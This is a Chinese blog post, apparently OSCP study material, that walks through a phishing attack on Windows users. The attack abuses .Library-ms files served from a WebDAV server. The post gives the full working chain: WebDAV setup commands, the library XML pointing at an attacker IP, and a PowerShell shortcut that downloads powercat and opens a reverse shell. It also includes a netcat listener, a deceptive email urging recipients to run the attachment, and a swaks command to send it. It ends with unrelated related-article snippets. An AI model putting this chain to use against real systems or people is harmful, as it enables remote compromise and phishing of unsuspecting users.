OSCP:发送钓鱼电子邮件执行客户端攻击

news/2025/1/30 10:55:59 标签: windows, 网络安全

概述

在渗透测试领域,钓鱼攻击是一种有效的客户端攻击手段,尤其在目标用户缺乏安全意识或系统存在未修复漏洞时,成功率较高。针对Windows平台,滥用Windows库文件(.Library-ms)是一种技术性较强但易于实施的攻击方式。这种方法利用了Windows库文件的特性,通过结合WebDAV服务和恶意脚本,可在目标系统上执行任意代码,从而进一步控制目标设备。

本文旨在详细解析如何使用Windows库文件发起钓鱼攻击,并通过实际操作流程展示如何成功获取目标的反弹Shell。同时,文中还包含对攻击工具、文件配置、钓鱼邮件内容设计及服务部署的全面讲解。


攻击流程

为了确保钓鱼攻击的成功,攻击者需经过充分准备,包括搭建服务环境、制作诱导目标执行的文件及设计合适的社会工程策略。以下是具体的攻击流程:

1. 准备工作

在攻击的准备阶段,攻击者需要搭建一个WebDAV服务器,用于托管攻击所需的恶意文件。WebDAV服务器是实现文件托管与目标连接的重要组件。

1.1 安装WebDAV

在Kali Linux上,可通过wsgidav快速搭建WebDAV服务器。以下是安装命令:

pip3 install wsgidav

此命令会下载并安装WebDAV所需的组件,为后续服务器部署做好准备。

1.2 创建WebDAV目录

为了存放恶意文件,需创建一个目录并进行初步测试:

mkdir /home/kali/webdav
touch /home/kali/webdav/test.txt

通过创建测试文件,可以确认目录权限及服务是否正常运行。

1.3 启动WebDAV服务器

完成目录准备后,启动WebDAV服务器,并配置为匿名访问以便目标用户无需认证即可连接:

/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

此时,WebDAV服务已启动并在80端口监听,后续恶意文件将托管于此服务器。


2. 创建恶意库文件

在攻击实施阶段,核心是构建一个可以诱导目标系统执行的恶意库文件及快捷方式文件。它们的设计决定了攻击的有效性。

2.1 构建config.Library-ms文件

config.Library-ms文件是用于连接目标与攻击者WebDAV服务器的关键。以下是其XML代码:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.119.2</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

此文件的关键字段为<url>,需要替换为攻击者WebDAV服务器的实际地址。目标用户一旦打开该文件,Windows会尝试连接该URL。

2.2 构建快捷方式文件

快捷方式文件负责执行恶意代码,以下为典型的PowerShell下载和反弹Shell命令:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1'); powercat -c 192.168.119.3 -p 4444 -e powershell"

此命令将在目标机器上下载并执行powercat.ps1脚本,连接回攻击者机器,形成反弹Shell。


3. 分发恶意文件

构建完成的恶意文件需传递给目标用户,可通过以下方式实现:

  1. 邮件附件:结合社会工程设计的钓鱼邮件,以附件形式发送。
  2. SMB共享:通过内网文件共享上传至目标访问的目录。

将文件上传至WebDAV目录:

cd /home/kali/webdav
smbclient //192.168.50.195/share -c 'put config.Library-ms'

4. 获取反弹Shell

当目标用户打开恶意文件夹或执行快捷方式文件时,攻击者便可通过监听器获取目标系统的交互式Shell。

配置监听器

在攻击者机器上启动Netcat监听器以接收反弹Shell:

nc -nvlp 4444

通过监听器,攻击者可捕获目标设备的Shell连接,执行后续命令获取进一步的权限。


钓鱼邮件设计与发送

社会工程邮件设计

钓鱼邮件的成功关键在于内容的可信性。以下是一个样例邮件:

Subject: Staging Script

Hey!

I checked WEBSRV1 and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.

On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within.

Thanks!  
John

邮件中提到的“内部信息”(如Git日志)提升了可信度,增加了目标用户打开附件的可能性。

使用swaks发送邮件

通过swaks发送钓鱼邮件(需要输入用户凭据):

sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

总结

滥用Windows库文件是一种隐蔽且有效的攻击手段。通过结合WebDAV服务和恶意脚本,攻击者可以轻松地在目标系统上执行任意代码。

免责声明:本文内容仅限于合法授权的渗透测试环境中使用,任何非法用途均需自行承担后果。


http://www.niftyadmin.cn/n/5837767.html

相关文章

家政预约小程序11分类展示

目录 1 创建页面2 配置导航菜单3 配置侧边栏选项卡4 配置数据列表5 首页和分类页联动总结 我们现在在首页开发了列表显示服务信息的功能&#xff0c;在点击导航菜单的时候&#xff0c;需要自动跳转到对应的分类&#xff0c;本篇我们介绍一下使用侧边栏选项卡实现分类显示的功能…

全面解析文件包含漏洞:原理、危害与防护

目录 前言 漏洞介绍 漏洞原理 产生条件 攻击方式 造成的影响 经典漏洞介绍 防御措施 结语 前言 在当今复杂的网络安全环境中&#xff0c;文件包含漏洞就像潜藏在暗处的危险陷阱&#xff0c;随时可能对防护薄弱的 Web 应用发起致命攻击。随着互联网的迅猛发展&#xff…

[蓝桥杯 2014 省 AB] 蚂蚁感冒

题目描述 长 100厘米的细长直杆子上有 n 只蚂蚁。它们的头有的朝左&#xff0c;有的朝右。 每只蚂蚁都只能沿着杆子向前爬&#xff0c;速度是 1 厘米 / 秒。 当两只蚂蚁碰面时&#xff0c;它们会同时掉头往相反的方向爬行。 这些蚂蚁中&#xff0c;有 1 只蚂蚁感冒了。并且…

C# as 和 is 运算符区别和用法

前言 在C#中&#xff0c;as 和 is 关键字都用于处理类型转换的运算符&#xff0c;但它们有不同的用途和行为。本文我们将详细解释这两个运算符的区别和用法。 is 运算符 is 运算符用于检查对象是否是某个特定类型&#xff0c;或者是否可以转换为该类型。它返回一个布尔值 (t…

大数据相关职位介绍之一(数据分析,数据开发,数据产品经理,数据运营)

大数据相关职位介绍之一 随着大数据、人工智能&#xff08;AI&#xff09;和机器学习的快速发展&#xff0c;数据分析与管理已经成为各行各业的重要组成部分。从互联网公司到传统行业的数字转型&#xff0c;数据相关职位在中国日益成为推动企业创新和提升竞争力的关键力量。以…

深入 Rollup:从入门到精通(一)专栏介绍

专栏介绍 欢迎来到 《深入 Rollup&#xff1a;从入门到精通》 专栏&#xff01;&#x1f389; 本专栏将带您全面掌握 Rollup 这一强大的 JavaScript 模块打包工具。 无论您是初学者还是有一定经验的开发者&#xff0c;都能在这里找到适合自己的学习路径。 通过本专栏&#…

Vue3 结合 .NetCore WebApi 前后端分离跨域请求简易实例

1、本地安装Vue3环境 参考&#xff1a;VUE3中文文档-快速上手 注意&#xff1a;初始安装vue时&#xff0c;需要安装router&#xff0c;否则后续也要安装 2、安装axios组件 比如&#xff1a;npm install axioslatest 或 pnpm install axioslatest 3、设置跨域请求代理 打开…

BGP分解实验·15——路由阻尼(抑制/衰减)实验

一个可以监控路由信息不稳定征兆的小特性&#xff0c;那些表现出不稳定的路由将会受到惩罚&#xff0c;直到它稳定下来为止。 实验拓扑如下&#xff1a; 配置两台路由器的基础连通性后&#xff0c;再到R2上设置半衰期5分钟、使用阈值750&#xff0c;惩罚阈值1500&#xff1b;并…